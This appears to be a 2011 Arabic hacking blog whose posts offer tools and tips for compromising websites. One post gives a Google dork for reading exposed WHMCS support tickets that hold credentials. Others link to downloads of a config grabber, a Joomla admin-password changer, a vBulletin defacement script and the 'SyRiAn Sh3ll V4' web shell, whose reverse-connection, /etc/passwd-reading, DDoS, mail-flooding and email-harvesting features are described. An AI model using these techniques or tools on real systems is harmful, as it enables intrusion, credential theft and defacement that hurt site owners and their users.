ثغرة فى سكريبت WHMCS اظهار بينات الموقع بدون تعب

سبتمبر 25, 2011 تعليق واحد

تعريف الثغره : تقوم بإظهار تذاكر الدعم الفنى التى يحتوى 90% منها علي بينات مهمه اذا كانت بينات سي بانل او دومين او ادمن في احد الاسكريبتات .

الاسكريبت المصاب : WHMCS

الملف المصاب : viewticket.php

دورك الثغرة : inurl:viewticket.php?tid

طريقة الاستغلال : ضع الدورك في جوجل و افتح التذاكر و راح يظهر ليك محتوها بدون تعب : )

بالتوفيق

التصنيفات :My lessons

شرح اختراق جميع مواقع السيرفر باسهل و اسرع طريقه

أغسطس 29, 2011 2تعليقان

بسم الله الرحمن الرحيم
السلام عليكم و رحمه الله و بركاته
طلب منى بعض الاخوه شرح لطريقه اختراق اكثر من موقع علي السيرفر
لانهم مش قادرين يوصلو انهم ياخدو روت
انا عملت شرح بسيط كده و الاول نشوف الادوات المستخدمه
سكريبت عرض دومينات السيرفر مع يوزرتها PHP
سكريبت بريل لسحب كونفينجات السيرفر Enabled to withdraw All configs
سكربت تغير باسورد الادمن لسكربت الجملة Change Password of Admin Joomla
الشيل السورى الاصدار الرابع SyRiAn Sh3ll V4
سكريبت تغير صفحات المنتدى Script change index vBulletin

لتحميل الدرس
Download

التصنيفات :Uncategorized

سكريبت عرض دومينات السيرفر مع يوزرتها PHP

أغسطس 29, 2011 أضف تعليقاً

بسم الله الرحمن الرحيم
السلام عليكم و رحمه الله و بركاته
سكريبت عرض كل الدومينات علي السيرفر مع يوزرتها
سكريبت مُبرمج بلغه الـ PHP
للتحمل
Download

التصنيفات :Uncategorized

سكريبت بريل لسحب كونفينجات السيرفر Enabled to withdraw All configs

أغسطس 29, 2011 تعليق واحد

بسم الله الرحمن الرحيم السلام عليكم و رحمه الله و بركاته …
سكريبت البريل المعروف لسحب اختصارات السيرفر بالكامل
للتحمل
Download

التصنيفات :Tools

سكربت تغير باسورد الادمن لسكربت الجملة Change Password of Admin Joomla

يوليو 27, 2011 تعليق واحد

بسم الله الرحمن الرحيم
السلام عليكم و رحمه الله و بركاته
الكثرين منا يواجه مشكله في تعليق الاندكس علي سكريبت الجملا
لانه يتبع تلك الطريقه القديمه
1- سحب اختصار للكونفيج
2- الاتصال بقعاده البينات
3 – تغير باسورد الادمن أو فك تشفيرهـ
4 – دخول لوحه التحكم

النهردهـ انا جايب ليكم سكريبت هيريحكم من دهـ كله !!
سكريبت تفير بينات الادمن في سكريبت الجوملا
للتحميل
http://www.mediafire.com/?zz0ei702thi4wek

التصنيفات :Tools

الشيل السورى الاصدار الرابع SyRiAn Sh3ll V4

يوليو 27, 2011 تعليق واحد

SyRiAn Sh3ll V4

بسم الله الرحمن الرحيم

بعد ان اثبت الشيل السورى جدارته
اود ان اُشاركم اياه , مع إظهار بعض امكانياته

1- المستطيل الاول :

ويحتوي على معلومات كاملة عن السيف مود ونوع النظام المستخدم على السيرفر ومساحته والدوال الممنوعة وايضا اصدار السيرفر
واصدارات البرامج مثل مترجمات php وايضا mysql وايضا يعطيك الــ ip الخاص بالسيرفر وطبعا المبرمج اضاف خاصية فك هاشات عن طريق موقع

2- المستطيل الثاني :

يحتوي على تطبيق لثلاث اوامر وهيا الامر uname -a الخاص بأظهار البيانات الخاصة بنظام المستخدم على السيرفر مثل اصدار
الكيرنال وايضا اضاف المبرمج خاصية البحث في جوجل عن ثغرات لهذا الاصدار
ايضا استخدم امر pwd الخاص بأظهار مسار الشل على السيرفر
وايضا استخدم الامر id لاظهار صلاحيات الشل على السيرفر من يوزر او نو بدي او روت

3- المستطيل الثالث :

هذا المربع الخاص بأظهار كل النتائج المنفذه على الشل مثل الشاشة الخاصة بعرض تطبيق الاوامر المنفذة على الشل
وهيا تقوم بعرض ملفات الموقع

4- المستطيل الرابع :

يحتوي على 12 خاصية وهيا كالأتي :

1- commands alis : يحتوي على مجموعة من الاوامر الجاهزة يتم استغلالها بمجرد الضغط عليها
2- command line : هذا هوا سطر تنفيذ الاومر ويأتي اسفل منه المسار المتواجدين عليه والمنفذ داخلة الامر ويمكن التنقل من خلاله
3- edit file : خاصية اضافة ملف بأي صيغة مثل file.php من ثما نضع الكود المراد حقنه داخل الملف المكون ونجد بجانب الشاشة كلمة save حتي يتم حفظ الملف
4- change mode : خاصية اعطاء تصريح للملفات او المجلدات
5- get file : خاصية سحب ملف من سيرفر اخر عن طريق رابط الملف المراد سحبه الى السيرفر المرفوع عليه الشل
6- bind connection : احدى طرق الاتصال العكسي بالسيرفر
7- cgi perl : خاصية انشاء شل بصيغة perl
8- forbidden : هيا خاصية تخطي مشكلة ظهور رسالة forbidden بتطبيق بعض ثغرات التخطي
9- back connection : احدى طرق الاتصال العكسي بالسيرفر
10- hash analyzer : هي خاصية تحليل الهاش ومعرفة نوع التشفير الخاصة بالباسورد
11- evel code : هوا سطر تنفيذ اوامر عن طريق دوال php
12- users & domains : اسكربت مبرمج بلغة perl لسحب يوزرات السيرفر واسماء المواقع

5- المستطيل الخامس

1- Reading Files & Dir Using PHP Bugs : قراءة ملف /etc/passwd عن طريق بعض ثغرات php
2- Encryption : خاصية تشفير الباسورد ببعض انواع التشفيرات
3- Metasploit Connection : احدى طرق الاتصال العكسي بالسيرفر عن طريق الميتاسبوليت
4- DDOS Attacker : خاصية عمل هجوم ايقاف الخدمة عن السيرفر
5- ports scanner : خاصية فحص بورتات السيرفر ومعرفة اي البورتات المفتوحة
6- acp finder : خاصية البحث عن لوحة التحكم للأي اسكربت
7- server shortcut : هيا احدى طرق تخطي صلاحيات اليوزر وهيا سحب اختصار للجزر ( root ) ملفات الروت
8- fast tools : هيا خاصية اضافة او زرع بعض الاداوت المساعدة للتخطي منع تنفيذ الدوال والسيف مود وايضا عرض يوزرات السيرفر والكونفقات
9- sql reader : خاصية قرائة الملفات او المسارات او تطبيق الاوامر عن طريق ثغرة sql
10 – mail storm :هي خاصية اغراق الاميل برسائل
11- sql query : هيا خاصية الدخول على قاعدة بيانات الموقع واستعراض الاعمدة والجدوال الخاصة بالموقع
12- email extractor : خاصية سحب الأميلات من قاعدة البيانات

7- المستطيل السابع

1- sqripts hacking : اسكربت التعديل او حقن الاندكس او الصفحة الرئسية للبعض الاسكربتات بصفحة الاختراق الخاصة بالمخترق
2- decrypting configs : خاصية كسر تشفير الكونفق مهما كان نوع التشفير زند او غيرها
3- Changing Admin Info : خاصية تغير معلومات مدير الموقع من باسورد ويوزر نيم

هذه معلومات مُختصره عن الشيل او شرح مُختصر ليه
ملاحظه : الشرح من كتابه TeaM HacKer Egypt

لتحميل الشيل
http://www.mediafire.com/?rncsd1k2bjz2q66

التصنيفات :Tools

سكريبت تغير صفحات المنتدى Script change index vBulletin

يوليو 25, 2011 تعليق واحد

بسم الله الرحمن الرحيم
طبعاً كلنا عارفين سكريبت تغير صفحات منتديات او سكريبت الفبلتين ؛؛ الاسكربت كان شغال علي كل اصدرات الفبلتين معدا الاصدارت 4.1.× و ما يلها .. عدلت علي الاسكريبت و جربته عده مرات علي كل الاصدارت الخاصه بالفبلتين
و غيرت شكل سكريبت تغير صفحات المنتدي يعمل

تحميل
http://www.mediafire.com/?5qucpcl9y1kdwk9

التصنيفات :Tools